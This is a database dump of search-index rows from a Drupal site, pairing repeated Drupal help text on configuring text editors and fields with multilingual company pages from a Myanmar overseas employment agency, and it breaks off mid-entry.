(23, 'ja', 'help_search', ' connecting text editors to text formats goal configure a text format so that when a user is editing text and selects this text format a text editor installed on your site is shown configure the text editor such as choosing which buttons and functions are available see managing text filters and text formats for more about text formats what is a text editor  a text editor is software typically a javascript library that provides buttons and other command mechanisms to make editing html text easier some editors are called visual or wysiwyg what you see is what you get  editors these editors hide the details of html from the user and instead show formatted output on the screen the core text editor module provides a framework for deploying text editors on your site the core ckeditor 5 module provides ckeditor 5 which is a widelyused javascript text editor that creates clean and valid html the module also enforces the html tag restrictions in the associated text format various contributed modules provide other editors to install a new editor besides installing the module you may need to download the editor library from a thirdparty site steps in the manage administrative menu navigate to configuration   content authoring   text formats and editors  the text editor column in the table shows the text editor that is currently connected to each text format if any follow the steps on managing text filters and text formats to add a new text format or configure an existing text format when you reach the step about text editors return to this topic select ckeditor 5 as the text editor  or another text editor that you have installed the rest of these steps assume you selected ckeditor 5  under toolbar configuration  drag buttons between available buttons and active toolbar  only buttons in active toolbar will be shown to the user focusing or hovering over a button will display a tooltip explaining what the button does drag buttons within active toolbar to the desired order and group buttons by dragging them between group identifiers drag a new group identifier to the toolbar to add additional groups if you add buttons that require configuration the ckeditor 5 plugin settings section will be visible and provide their respective configuration forms return to managing text filters and text formats to complete the text format configuration and be sure to save the text format  ', 1787923659),
(23, 'ja', 'node_search', '  会社情 社情報   会社情 社情報 cometadmin mon 7032023 1807 当社は 2004 年に設 に設立 設立さ 立され 登録 id 29520042005 を取得 取得し 以来サ 来サー サービ ービス ビスの スの提 の提供 提供を 供を行 を行っ 行って ってき てきま きまし ました そして 2023 年に当 に当社 当社ニ 社ニュ ニュー ューコ ーコメ コメッ メット ットト トトレ トレン レンデ ンディ ディン ィング ング海 グ海外 海外エ 外エー エージ ージェ ジェン ェンシ ンシー シーを ーを設 を設立 設立し 運営を 営を開 を開始 開始し 始しま しまし ました 当社は 社はニ はニュ ニュー コメッ メット トレー レーデ ーディ ディン ィング グルー ループ ープの プの一 の一部 一部で 部であ である その中 の中で 中で最 で最大 最大規 大規模 規模の 模のゼ のゼー ゼーヤ ーヤー ヤーニ ーニュ ニュー ューコ ーコメ コメッ メット ット自 ト自動 自動車 動車売 車売買 サービ ービス ビス株 ス株式 株式会 式会社 会社は 社は自 は自動 自動車 動車の 車の輸 の輸入 輸入許 入許可 許可を 可を得 を得て 建設現 設現場 現場用 場用の 用のト のトラ トラッ ラック ックや 交通機 通機関 機関と 関とし として して使 て使わ 使われ われる れるバ るバス バスや スや様 々 な機械 機械を 械を日 を日本 日本か 本から から直 ら直接 直接輸 接輸入 輸入し 販売す 売する する事 る事業 事業を 25 年間続 間続け 続けて けてき てきま きまし ました 納税も 税もき もきち きちん ちんと んと行 と行い 100 人の従 の従業 従業員 業員を 員を雇 を雇用 雇用す 用する するま るまで までに でにな になり なりま りまし ました また グルー ループ ープの プの一 の一部 一部で 部であ である あるニ るニュ ニュー ューコ ーコメ コメッ メット ット建 ト建築 建築株 築株式 株式会 式会社 ゼッヤ ッヤシ ヤシェ シェピ ェピー ピーテ ーティ ティー ィー建 ー建築 建築株 築株式 株式会 式会社 アウン ウンネ ンネー ネーウ ーウィ ウィン ィン建 ン建築 建築株 築株式 株式会 式会社 会社も 社も政 も政府 政府か 府から から許 ら許可 許可を 可を多 を多く 多く受 く受け 受け取 け取り 合わせ わせて 200 人以上 以上の 上の人 の人材 人材紹 材紹介 紹介に 介に成 に成功 成功し 功して してお ており おりま ります 現在 ニュー ューコ ーコメ コメッ メット ットト トトレ トレン レンデ ンディ ディン ィング ング海 グ海外 海外エ 外エー エージ ージェ ジェン ェンシ ンシー シーで ーでは ミャン ャンマ ンマー マー全 ー全国 全国か 国から から来 ら来た 来た民 た民族 民族を 族を問 を問わ 問わず わずに ずに韓 に韓国 韓国の 国の造 の造船 造船所 船所で 所で働 で働き 働きた きたい たい人 い人た 人たち たちに ちに対 に対し 対して シンマ ンマラ マライ ライ湾 イ湾岸 湾岸で 岸で経 で経験 経験豊 験豊富 豊富な 富な指 な指導 指導者 導者た 者たち たちの ちの下 の下で 下で訓 で訓練 訓練を 練を受 を受け 受ける ける機 る機会 機会を 会を提 を提供 提供し 仕事の 事の紹 の紹介 紹介を 介を行 を行っ 行って ってい ていま います さらに ドバイ マレー レーシ ーシア シンガ ンガポ ガポー ポール タイ 日本 韓国な 国など への就 の就職 就職も 職もサ もサポ サポー ポート ートし トして してい ていま います ミャン ャンマ ンマー マーの ーの若 の若者 若者た 者たち たちが ちが自 が自分 自分ら 分らし らしさ しさを さを保 を保ち 保ちな ちなが ながら 自分に 分に合 に合っ 合った った仕 た仕事 仕事を 事を見 を見つ 見つけ 日本の 本の技 の技術 技術を 術を学 を学ぶ 学ぶこ ぶこと ことが とがで ができ できる きるよ るよう ように うに支 に支援 支援を 援を続 を続け 続けて けてい ていま います 日本語 本語能 語能力 能力試 力試験 jlpt jft nattest topj に合格 合格し 格した した学 た学生 学生に 生に対 に対し 対して しては ワーク ークビ クビザ ビザや ザや研 や研修 研修ビ 修ビザ ビザを ザを取 を取得 取得す 得する するた るため ための めの支 の支援 支援を 援を提 を提供 提供し 供して してい ていま います 我 々 ニュー ューコ ーコメ コメッ メット ットト トトレ トレー レーデ ーディ ディン ィング ング海 グ海外 海外エ 外エー エージ ージェ ジェン ェンシ ンシー シーは 経験豊 験豊富 豊富で 富で能 で能力 能力の 力の高 の高い 高い研 い研修 研修生 修生を 生を育 を育成 育成し 海外の 外の仕 の仕事 仕事チ 事チャ チャン ャンス ンスを スを提 を提供 提供す 供する するこ ること ことに とに尽 に尽力 尽力し 力して して参 て参り 参りま ります  ', 0),
(23, 'ko', 'help_search', ' connecting text editors to text formats goal configure a text format so that when a user is editing text and selects this text format a text editor installed on your site is shown configure the text editor such as choosing which buttons and functions are available see managing text filters and text formats for more about text formats what is a text editor  a text editor is software typically a javascript library that provides buttons and other command mechanisms to make editing html text easier some editors are called visual or wysiwyg what you see is what you get  editors these editors hide the details of html from the user and instead show formatted output on the screen the core text editor module provides a framework for deploying text editors on your site the core ckeditor 5 module provides ckeditor 5 which is a widelyused javascript text editor that creates clean and valid html the module also enforces the html tag restrictions in the associated text format various contributed modules provide other editors to install a new editor besides installing the module you may need to download the editor library from a thirdparty site steps in the manage administrative menu navigate to configuration   content authoring   text formats and editors  the text editor column in the table shows the text editor that is currently connected to each text format if any follow the steps on managing text filters and text formats to add a new text format or configure an existing text format when you reach the step about text editors return to this topic select ckeditor 5 as the text editor  or another text editor that you have installed the rest of these steps assume you selected ckeditor 5  under toolbar configuration  drag buttons between available buttons and active toolbar  only buttons in active toolbar will be shown to the user focusing or hovering over a button will display a tooltip explaining what the button does drag buttons within active toolbar to the desired order and group buttons by dragging them between group identifiers drag a new group identifier to the toolbar to add additional groups if you add buttons that require configuration the ckeditor 5 plugin settings section will be visible and provide their respective configuration forms return to managing text filters and text formats to complete the text format configuration and be sure to save the text format  ', 1787923659),
(23, 'ko', 'node_search', '  회사 설립   회사 설립 cometadmin mon 7032023 1807 저희 new comet trading 회사는 2004 년에 설립되 립되어 사업자 업자등 자등록 등록번 록번호 29520042005 로 영업을 시작하 작하였 하였습 였습니 습니다 뉴코멧 해외직 외직업 직업소 업소개 소개회 개회사 회사는 2023 년 외국인 국인고 인고용 고용업 면허를 취득하 득하여 서비스 활동을 시작하 작하였 하였습 였습니 습니다 저희 뉴코멧 해외직 외직업 직업소 업소개 소개회 개회사 new comet overseas employment agency 는자매 회사인 제야뉴 야뉴코 뉴코멧 자동차 판매 및 서비스 회사 뉴코멧 코멧회 멧회사 회사등 기업들 업들과 협력하 력하여 경제통 제통상 통상자 상자원 자원부 원부에 부에서 차량 수입허 입허가 허가를 신청했 청했고 각종 상용트 용트럭 관광 산업 및 운송에 사용되 용되는 다양한 유형의 버스 및 기계를 일본에 본에서 직접 구매 판매하 매하는 사업을 25 년 이상 종사해 왔고 나라를 위한 정한 세금들 금들을 냈습니 습니다 게다가 100 명 이상의 직원에 원에게 고용 기회를 제공했 공했습 했습니 습니다 또한 쌍둥이 회사인 뉴코멧 코멧건 멧건설 회사 제야슈 야슈웨 슈웨삐 웨삐띡 건설 회사 아웅네 웅네원 회사들 사들은 정부 부처로 처로부 로부터 입찰 tender 을 받고 건설 작업을 하는 동안 200 명 이상의 직원에 원에게 고용 기회를 제공했 공했습 했습니 습니다 저희 뉴코멧 해외 직업 소개회 개회사 는 한국 조선소 선소로 취업을 희망하 망하는 미얀마 각지에 지에서 온 소수민 수민족 형제들 제들을 교통통 통통신 통신부 산하의 씬마락 sinmalike 조선소 선소에 소에서 유능한 트레이 레이너 이너들 너들와 함께 실력있 력있는 용접공 접공이 되도록 수업을 제공하 공하고 있으며 관련 기업체 업체로 취업할 수 있게 도와주 와주고 있습니 습니다 또한 두바이 말레이 레이시 이시아 싱가포 가포르 태국 일본 그리고 한국 등과 같은 국가에 가에서 일하기 하기를 원하는 청년들 년들에 들에게 취업 기회를 갖을 수 있도록 서비스 비스를 제공하 공하고 있습니 습니다 new comet trading agency co ltd 는 미얀마 얀마의 젊은 치누들 누들이 일본의 개발한 첨단 기술을 배우고 꿈을 실현할 수 있도록 필요한 교육을 제공하 공하고 돕고 있습니 습니다 일본으 본으로 취업비 업비자 연수비 수비자 비자로 가기 위해 필요한 자격시 격시험 jlpt jft nattest topj 에 합격할 수 있도록 어학당 학당도 개설 및 교육을 지원하 원하고 있습니 습니다 저희는 뉴코멧 해외직 외직업 직업소 업소개 소개회 개회사 는 미얀마 얀마에 마에서 우수한 기능인 능인력 인력을 배출하 출하여 해외로 파견하 견하는 서비스 비스를 제공하 공하기 위해 끊임없 임없이 노력하 력하고 있습니 습니다  ', 0),
(24, 'en', 'help_search', ' adding a field to an entity subtype goal add a field to an entity subtype see managing content structure for an overview of entity types and subtypes as well as an overview of field types steps navigate to the page for managing the entity subtype you want to add the field to for example to add a field to a content type in the manage administrative menu navigate to structure   content types  find the particular subtype that you want to add the field to and click manage fields  click add field  in add a new field  select the type of field you want to add see managing content structure for an overview of field types the label field should now be visible enter a label for the field which is used as the field label for both content editing and content display click save and continue  on the next screen enter a value for allowed number of values  you can limit the field to one value per entity item a set number of values or set it to have unlimited values click save field settings  on the next screen optionally edit the settings for the field which vary depending on what field type you are creating for all fields you can edit the label   help text  text to be displayed below the field on the content editing page and required field  to make it so a value must be entered in order to save the content when editing you can also configure a default value for the field click save settings  you should be returned to the manage fields page with your new field in the list  ', 1787923659),
(24, 'en', 'node_search', ' our services our services cometadmin mon 7032023 1808 1 providing necessary training to all citizens of myanmar regardless of race and religion from various regions and states who want to work at the shipyards in korea with an e 73 visa as a welder technician level at the sinmalike shipyard under the ministry of transport and communications and connecting them with job opportunities 2 coopening and teaching korean japanese thailand and english basic language courses for work so that there are no difficulties in the workplace when traveling to foreign countries to work 3 providing passport application service for those who do not have a passport pj required to travel to foreign countries 4 for those who want to work in japan with a training visa tokutei ginou visa we are opening and teaching the necessary courses to get familiar with japan s traditional culture and customs and connect with employment opportunities 5 those who pass the japanese language test n3 n2 jlpt jft nattest top j and above who have a work visa we are connecting with related courses and services below translation services it businesses engineering related works civil mechanical ep ec auto cad etc nursing support activities those who want to work with a training visa we are also providing services to following businesses car repair and related works industrial works house building works food industries rice box factories shop operations hotel businesses garment industries construction works agricultural works water products fisheryrelated factories elderly care services businesses 6 for those who want to work in countries such as dubai malaysia singapore thailand japan korea and etc we provide services to facilitate employment opportunities if necessary we connect with many courses such as computer training and basic english courses 7 the above services are arranged and provided in accordance with the standards of ethical recruitment and fair labor practices established by the international recruitment integrity system iris new comet agency has opened hit language center to provide language requirement in the workplace from the hit language center korean language class that will teach business expressions needed in the koshipa skill test interview to give you an advantage in communication even if you have the same skills japanese language class for those who want to master the japanese language from the basics for those who want to go to japan with tokutei visa workonly training visa elderly care kaigo beginner it computer degree we are constantly connecting with training schools and providing training classes to make them full of talent for those who want to take japanese language courses in the other surrounded cities we are connecting with other joint language schools in bago mawlamyine and sagaing  ', 0),
(24, 'ja', 'help_search', ' adding a field to an entity subtype goal add a field to an entity subtype see managing content structure for an overview of entity types and subtypes as well as an overview of field types steps navigate to the page for managing the entity subtype you want to add the field to for example to add a field to a content type in the manage administrative menu navigate to structure   content types  find the particular subtype that you want to add the field to and click manage fields  click add field  in add a new field  select the type of field you want to add see managing content structure for an overview of field types the label field should now be visible enter a label for the field which is used as the field label for both content editing and content display click save and continue  on the next screen enter a value for allowed number of values  you can limit the field to one value per entity item a set number of values or set it to have unlimited values click save field settings  on the next screen optionally edit the settings for the field which vary depending on what field type you are creating for all fields you can edit the label   help text  text to be displayed below the field on the content editing page and required field  to make it so a value must be entered in order to save the content when editing you can also configure a default value for the field click save settings  you should be returned to the manage fields page with your new field in the list  ', 1787923659),
(24, 'ja', 'node_search', '  事業内 業内容   事業内 業内容 cometadmin mon 7032023 1808 1 ニュー ューコ ーコメ コメッ メット ットト トトレ トレン レンデ ンディ ディン ィング ング海 グ海外 海外エ 外エー エージ ージェ ジェン ェンシ ンシー シーで ーでは では韓 は韓国 韓国の 国の造 の造船 造船所 船所で e 73 visa で働き 働きた きたい たいミ いミャ ミャン ャンマ ンマー マー全 ー全国 全国か ら民族 民族問 族問わ 問わず シンマ ンマラ マライ ライ湾 イ湾岸 湾岸で 岸で経 で経験 経験豊 験豊富 豊富な 富な先 な先生 先生達 生達の 達の元 の元で 元で練 で練習 練習を 習を重 を重ね 重ねた ねた研 た研修 研修を 修をし をして してい ていた いただ ただき 仕事紹 事紹介 紹介を 介をし をして してお り ます 2 海外に 外に勤 に勤め 勤める める際 る際使 際使え 使える えるそ るそれ それぞ れぞれ ぞれの れの国 の国の 国の言 の言語 言語が 語が勉 が勉強 勉強で 強でき できる きる学 る学校 学校も 校も開 も開い 開いて いてお ており おりま ります 現在日 在日本 日本語 本語学 語学校 韓国語 国語学 語学校 タイ語 イ語学 語学校 英語学 語学校 3 パスポ スポー ポート ート作 ト作成 作成サ 成サー サービ ービス 4 日本に 本に実 に実習 実習生 特定技 定技能 技能な 能など などで どで勤 で勤め 勤める める学 る学生 学生達 生達に 達には には言 は言語 言語だ 語だけ だけで けでな でなく なく日 く日本 日本の 本の習 の習慣 文化な 化など なども ども授 も授業 授業の 業の一 の一部 一部と 部とし として 取り込 り込ん 込んで んでお でおり おりま ります 5 日本語 本語能 語能力 能力試 力試験 jlpt jft nattest topj の n3 n2 以上の 上の合 の合格 合格者 格者達 者達に 達には にはワ はワー ワーク ークビ クビザ ビザで ザであ である 通訳 翻訳 it 事業 エンジ ンジニ ジニア ニアに アに関 に関す 関する する事 る事業 civil mechanical ep ec auto card など 介護関 護関係 実習生 習生ビ 生ビザ ビザな ザなど などに どに興 に興味 興味を 味を持 を持た 持たれ たれた れた学 た学生 学生達 生達に 達には には下 は下記 の仕事 仕事の 事の紹 の紹介 紹介を 介を行 を行っ 行って ってお ており おりま ります 車修理 修理関 理関係 工業関 業関係 建築業 築業関 業関係 食品関 品関係 レスト ストラ トラン ホテル テル関 ル関係 衣類関 類関係 農業関 業関係 漁業関 業関係 関係の 係の工 の工場 介護関 護関係 training visa 6 ドバイ マレー レーシ ーシア シンガ ンガポ ガポー ポール タイ 日本 韓国な 国など などで どで働 で働き 働きた きたい たい学 い学生 学生達 生達の 達のた のため ために めにも にも英 も英語 英語な 語など など必 ど必要 必要な 要な場 な場合 場合に 合に応 に応じ 応じて パソコ ソコン コント ントレ トレー レーニ ーニン ニング ングで グでで ででき できな きない ない事 い事が 事がな がない ないよ いよう ように うに時 に時間 時間を 間をか をかけ かけて 良いネ いネッ ネット ットワ トワー ワーク ークで クで仕 で仕事 仕事の 事のチ のチャ チャン ャンス ンスを スを掴 を掴む 掴むサ むサビ サビー ビース ースを スをし をして してお ており おりま ります 7 上記の 記のサ のサー サービ ービス ビスを international recruitment integrity system iris が定め 定めた ethical recruitment and fair labour practices に合っ 合った った基 た基準 基準で 準で管 で管理 管理し 理して してお ており おりま ります ニュー ューコ ーコメ コメッ メット ットト トトレ トレン レンデ ンディ ディン ィング ング海 グ海外 海外エ 外エー エージ ージェ ジェン ェンシ ンシー シーは 職場で 場での での言 の言語 言語要 語要件 要件を 件を提 を提供 提供す 供する するた るため ために hit language center を開設 開設し 設しま しまし ました hit language center からの らのお のお知 お知ら 知らせ koshipa skill test interview で必要 必要と 要とさ とされ される れるビ るビジ ビジネ ジネス ネス表 ス表現 表現を 現を教 を教え 教える える韓 る韓国 韓国語 国語ク 語クラ クラス 同じス じスキ スキル キルを ルを持 を持っ 持って ってい ていて いても てもコ もコミ コミュ ミュニ ュニケ ニケー ケーシ ーショ ション ョンで ンで優 で優位 優位に 位に立 に立つ 立つた つため ための めの授 の授業 授業で 業です 基礎 基礎か 礎から から日 ら日本 日本語 本語を 語をマ をマス マスタ スター ターし ーした したい たい方 い方の 方のた のため ための めの日 の日本 日本語 本語ク 語クラ クラス 特定 特定ビ 定ビザ ビザで ザで日 で日本 日本に 本に行 に行き 行きた きたい たい方 々 には 働き専 き専用 トレー レーニ ーニン ニング ングビ グビザ 介護 介護ビ 護ビザ 初心者 it コンピ ンピュ ピュー ュータ ーター ター学 ー学校 学校卒 校卒業 卒業生 業生な 生など などに どに関 に関連 関連す 連する するト るトレ トレー レーニ ーニン ニング ング校 グ校と 校との とのつ のつな つなが ながり がりを りを継 を継続 継続的 続的に 的に提 に提供 提供し トレー レーニ ーニン ニング ングク グクラ クラス ラスを スを提 を提供 提供し 供して してい ていま います 他の 他の周 の周辺 周辺都 辺都市 都市で 市で日 で日本 日本語 本語の 語の授 の授業 授業を 業を受 を受け 受けた けたい たい方 々 には バゴ モーラ ーラミ ラミャ ミャイ ャイン サガイ ガイン インと ンとい といっ いった った他 た他の 他の共 の共同 共同語 同語学 語学学 学学校 学校と 校との との連 の連携 連携も 携も行 も行っ 行って ってお ており おりま ります  ', 0),
(24, 'ko', 'help_search', ' adding a field to an entity subtype goal add a field to an entity subtype see managing content structure for an overview of entity types and subtypes as well as an overview of field types steps navigate to the page for managing the entity subtype you want to add the field to for example to add a field to a content type in the manage administrative menu navigate to structure   content types  find the particular subtype that you want to add the field to and click manage fields  click add field  in add a new field  select the type of field you want to add see managing content structure for an overview of field types the label field should now be visible enter a label for the field which is used as the field label for both content editing and content display click save and continue  on the next screen enter a value for allowed number of values  you can limit the field to one value per entity item a set number of values or set it to have unlimited values click save field settings  on the next screen optionally edit the settings for the field which vary depending on what field type you are creating for all fields you can edit the label   help text  text to be displayed below the field on the content editing page and required field  to make it so a value must be entered in order to save the content when editing you can also configure a default value for the field click save settings  you should be returned to the manage fields page with your new field in the list  ', 1787923659),
(24, 'ko', 'node_search', '  회사 서비스   회사 서비스 cometadmin tue 7042023 735 1 한국 조선소 선소에 소에서 e73 비자 용접공 로 일하고 싶은 미얀마 여러 지역에 역에서 온 모든 노동자 동자들 자들을 인종과 종교의 차별 없이 교통통 통통신 통신부 산하 씬마락 sinmalike 조선소 선소에 소에서 필요한 교육을 시키고 취업 기회를 제공함 공함해 함해외 방문에 필요한 여권 pj 없는 분을 위한 여권 신청 서비스 제공 2 외국에 국에서 일할 때 직장에 장에서 어려움 려움을 겪지 않도록 직장에 사용하 용하는 기본 한국어 일본어 태국어 영어 등 교육시 육시킴 3 해외 방문에 필요한 여권 pj 없는 분을 위한 여권 신청 서비스 제공 4 일본으 본으로 연수비 수비자 도쿠테 쿠테이 기노 tokutei ginou 비자로 취업을 희망하 망하는 분들 위해 일본의 전통문 통문화 문화와 풍속을 익히도 히도록 필요한 코스를 개설 교육 시키고 취직을 연결 5 일본어 시험 n3 n2 jlpt jft nattest top j 이상에 합격하 격하는 분들이 work visa 인 번역 직업 it 직업 엔지니 지니어 니어링 관련 직업 civil mechanical ep ec auto cad 등 간호지 호지원 직업으 업으로 일본으 본으로 가고 싶다면 해당 학당으 당으로 연결 new comet trading agency 는 다음 사업체 업체를 훈련 비자 training visa 로 가고 싶은 젊은 형제 자매를 위해 서비스 비스를 주선하 선하고 있습니 습니다 자동차 수리 및 관련 직업 산업 직업 집 짓기 직업 식품 산업 쌀 상자 공장 매장 운영 호텔 비즈니 즈니스 의류 산업 건설 직업 농업 직업 물 제품 어업 관련 공장 노인 돌봄 서비스 사업 6 두바이 말레이 레이시 이시아 싱가포 가포르 태국 일본 한국 등과 같은 국가에 가에서 일하기 하기를 원하는 사람들 람들을 위해 기본 영어 과정과 필요하 요하는 경우에 컴퓨터 교육과 같은 많은 과정들 정들과 연결하 결하고 취업 기회를 제공하 공하는 서비스 비스를 하고 있습니 습니다 7 상기 서비스 비스들 스들을 iris international recruitment integrity system 에서 제정한 윤리적 채용 및 공정한 노동 관행의 기준에 따라 마련하 련하고 제공합 공합니 합니다 new comet agency 는 hit language center 를 개설하 설하여 직장에 장에서 필요한 언어교 어교육 교육을 제공합 공합니 합니다 hit 교육 센터에 터에서 에서는 koshipa 기량검 량검증 면접 시 도움되 움되는 한국어 표현을 효율적 율적으 적으로 가르칩 르칩니 칩니다 일본어 본어를 기초부 초부터 마스터 스터하 터하고 싶은 분을 위한 일본어 수업을 제공합 공합니 합니다 tokutei visa workonly training visa elderly care kaigo beginner it computer degree 로 일본에 가고자 하는 분들을 위한 교육센 육센터 센터와 연계하 계하여 필요한 기술을 습득하 득하도 하도록 합다 일본어 코스를 수강하 강하려 하려는 타지역 사람들 람들을 위해 bago mawlamyine 및 sagaing 의 교육 기관과 연계하 계하고 있습니 습니다  ', 0),
(25, 'en', 'help_search', ' configuring field display for an entity subtype goal configure the formatters used to display the fields of an entity subtype their order in the display and the formatter settings see managing content structure for background information steps navigate to the page for managing the entity type you want to add the field to for example to add a field to a content type in the manage administrative menu navigate to structure   content types  find the particular subtype that you want to configure the display of and click manage display in the operations list use the drag arrows to order the fields in your preferred order drag any fields that you do not wish to see in the display to the disabled section in the label column select the position for each field label in the display or  hidden  to hide a label you can also choose  visually hidden if you want the label s text to appear in the html page so that screen readers and search engines can read it but it will not be visible in the format column select the formatter for displaying each field after selecting the desired formatters click the settings gear in each row to change the settings for the formatter when you are done making changes click save  test the display for your entity subtype by viewing an entity if needed return to these steps to further refine the display  ', 1787923659),
(25, 'en', 'node_search', ' vision mission vision mission cometadmin mon 7032023 1809 our vision  the aim is to train the best local human resources and develop overseas employment opportunities as an international quality company  our mission  to create lasting relationships with our clients and candidates based on honesty integrity trust and mutual respect to be the leading partner that clients and candidates always choose to connect with  ', 0),
(25, 'ja', 'help_search', ' configuring field display for an entity subtype goal configure the formatters used to display the fields of an entity subtype their order in the display and the formatter settings see managing content structure for background information steps navigate to the page for managing the entity type you want to add the field to for example to add a field to a content type in the manage administrative menu navigate to structure   content types  find the particular subtype that you want to configure the display of and click manage display in the operations list use the drag arrows to order the fields in your preferred order drag any fields that you do not wish to see in the display to the disabled section in the label column select the position for each field label in the display or  hidden  to hide a label you can also choose  visually hidden if you want the label s text to appear in the html page so that screen readers and search engines can read it but it will not be visible in the format column select the formatter for displaying each field after selecting the desired formatters click the settings gear in each row to change the settings for the formatter when you are done making changes click save  test the display for your entity subtype by viewing an entity if needed return to these steps to further refine the display  ', 1787923659),
(25, 'ja', 'node_search', '  目標 ミッシ ッショ ション   目標 ミッシ ッショ ション cometadmin mon 7032023 1810  目標   能力の 力の高 の高い 高い生 い生徒 生徒達 徒達を 達を生 を生み 生み出 み出し 国際ス 際スタ スタン タンダ ンダー ダード ードに ドに負 に負け 負けな けない ない会 い会社 会社を 社を運 を運営 運営し 営して して参 て参り 参りま ります   ミッシ ッショ ション   正直さ 誠実さ 信頼 相互尊 互尊重 尊重を 重を基 を基本 基本に クライ ライア イアン アント ントや トや候 や候補 候補者 補者と 者と永 と永続 永続的 続的な 的な関 な関係 関係を 係を築 を築く 築くこ くこと クライ ライア イアン アント ントと トと候 と候補 候補者 補者か 者から から常 ら常に 常に選 に選ば 選ばれ ばれる れるリ るリー リーデ ーディ ディン ィング ング グ パ パー パート ートナ トナー ナーと ーとな となる なるこ ること  ', 0),
(25, 'ko', 'node_search', '  우리의 비젼 우리의 미션   우리의 비젼 우리의 미션 cometadmin mon 7032023 1810  우리의     비젼   목표는 최고의 인재를 양성하 성하고 국제 푶준 회사로 사로서 해외 취업 기회를 발굴하 굴하는 것입니 입니다   우리의     미션   대행사 행사와 고객 간의 상호 존중 정직 신뢰로 오래 지속되 속되는 관계를 구축하 축하기   다른 대행사 행사에 비하면 고객들 객들이 선호하 호하는 선두 에이전 이전시 되기 위해  ', 0),
(26, 'en', 'help_search', ' configuring the edit form for an entity subtype goal configure the widgets used to edit the fields of an entity subtype their order on the form and the widget settings see managing content structure for background information steps navigate to the page for managing the entity type you want to add the field to for example to add a field to a content type in the manage administrative menu navigate to structure   content types  find the particular subtype that you want to configure the editing form for and click manage form display in the operations list use the drag arrows to order the fields in your preferred order drag any fields that you do not wish to see on the editing form to the disabled section in the widget column select the widget for editing each field after selecting the desired widgets click the settings gear in each row to change the settings for the widget when you are done making changes click save  test the editing form for your entity subtype by editing or creating an entity if needed return to these steps to further refine the form  ', 1787923659),
(26, 'en', 'node_search', ' future goal future goal cometadmin mon 7032023 1811 our company is established with the aim of creating a company that meets the international standards providing training and employment opportunities to the future youth who want to work abroad according to the current conditions and needs of myanmar in order to ensure that there is no harm between employers and employees we are trying to select and produce workers in accordance with the standards of the international recruitment integrity system iris established by the international organization for migration iom  ', 0),
(26, 'ja', 'help_search', ' configuring the edit form for an entity subtype goal configure the widgets used to edit the fields of an entity subtype their order on the form and the widget settings see managing content structure for background information steps navigate to the page for managing the entity type you want to add the field to for example to add a field to a content type in the manage administrative menu navigate to structure   content types  find the particular subtype that you want to configure the editing form for and click manage form display in the operations list use the drag arrows to order the fields in your preferred order drag any fields that you do not wish to see on the editing form to the disabled section in the widget column select the widget for editing each field after selecting the desired widgets click the settings gear in each row to change the settings for the widget when you are done making changes click save  test the editing form for your entity subtype by editing or creating an entity if needed return to these steps to further refine the form  ', 1787923659),
(26, 'ja', 'node_search', '  会社の 社の目 の目標   会社の 社の目 の目標 cometadmin mon 7032023 1811 我 々 はミャ ミャン ャンマ ンマー マーの ーの現 の現状 現状を 状を見 を見抜 見抜き 海外で 外で働 で働き 働きた きたい たい生 い生徒 生徒達 徒達の 達の訓 の訓練 能力の 力の高 の高い 高い生 い生徒 生徒達 徒達を 達を生 を生み 生み出 み出し 国際ス 際スタ スタン タンダ ンダー ダード ードに ドに負 に負け 負けな けない ない会 い会社 会社に 社にな になる なるこ ること ことに とに目 に目指 目指し 指して してお ており おりま ります 会社と 社と労 と労働 労働者 働者の 者の間 の間に 間に損 に損失 損失が 失がな がない ないよ いよう ように international organization for migration iom が定め 定めた international recruitment integrity system iris に合っ 合った った基 た基準 基準で 準で管 で管理 管理し 理して してお ており おりま ります  ', 0),
(26, 'ko', 'help_search', ' configuring the edit form for an entity subtype goal configure the widgets used to edit the fields of an entity subtype their order on the form and the widget settings see managing content structure for background information steps navigate to the page for managing the entity type you want to add the field to for example to add a field to a content type in the manage administrative menu navigate to structure   content types  find the particular subtype that you want to configure the editing form for and click manage form display in the operations list use the drag arrows to order the fields in your preferred order drag any fields that you do not wish to see on the editing form to the disabled section in the widget column select the widget for editing each field after selecting the desired widgets click the settings gear in each row to change the settings for the widget when you are done making changes click save  test the editing form for your entity subtype by editing or creating an entity if needed return to these steps to further refine the form  ', 1787923659),
(26, 'ko', 'node_search', '  회사의 미래 비전   회사의 미래 비전 cometadmin mon 7032023 1812 우리 회사는 현재 미얀마 얀마의 상황과 필요에 따라 외국에 국에서 일하고 싶은 청년들 년들에 들에게 훈련과 해외취 외취업 기회 제공을 목표로 설립되 립되었 되었습 었습니 습니다 고용주 용주와 근로자 사이에 피해가 없도록 국제이 제이주 이주기 주기구 iom 에서 제정한 국제채 제채용 채용청 용청렴 청렴제 렴제도 iris 기준에 따라 근로자 로자를 선발하 발하고 생산하 산하도 하도록 노력하 력하고 있습니 습니다  ', 0),
(27, 'en', 'help_search', ' adding a reference field to an entity subtype goal add an entity reference field to an entity subtype see managing content structure for more information on entities and reference fields steps navigate to the page for managing the entity subtype you want to add the field to for example to add a field to a content type in the manage administrative menu navigate to structure   content types  find the particular subtype that you want to add the field to and click manage fields  click add field  in add a new field  select the type of reference field you want to add the reference section of the select list shows the most common types of reference field choose other  if the entity type you want to reference is not listed the label field should now be visible enter a label for the field which is used as the field label for both content editing and content display click save and continue  on the next screen verify that the type of entity you want to reference is shown in type of item to reference  or select it if not enter a value for allowed number of values  you can limit the field to one value per entity item a set number of values or set it to have unlimited values click save field settings  on the next screen optionally edit the settings for label   help text  text to be displayed below the field on the content editing page and required field  to make it so a value must be entered in order to save the content when editing in the reference type section you will usually want to limit the entity subtypes that can be referenced for example if you are creating a content reference you can check one or two content type choices the choices will be easier for content editors to scan if you also choose a sort value normally the entity title or label field click save settings  you should be returned to the manage fields page with your new field in the list  ', 1787923659),
(27, 'en', 'node_search', ' company history company history cometadmin mon 7032023 1812 new comet group of co ltd was founded in 1996 and started operation with branches companies as follow new comet construction coltd new zayya shwe pyi construction co ltd aung nay wun construction co ltd zeya new comet auto sale services co ltd new comet trading agency co ltd  new comet construction coltd new comet construction coltd was founded in 2004 with company licence 295 20042005 and started operation construction projects import and sale of construction and industrial machinery and vehicles based in yangon mandalay ayawaddy nay pyi taw sagaing states etc some of the construction works completed by us in the financial year 20132014 and 20142015 by our new comet construction co ltd are nationalities youth resource development degree college sagaing sagaing university two storyed classroom a joint venture housing project between road transport administration department and new comet construction coltd in addition to the above projects departmental and private building construction and repair works construction of affordable housing for exemployees in cities in irrawaddy region architectural design modeling construction of buildings and roads and bridges continues to be carried out according to standards with veteran consultants professional engineers management office staff project supervisors from the region and other regions skilled workers and modern equipment our company has been doing charity work for as long as it is capable of designing and calculating the strength of related religious 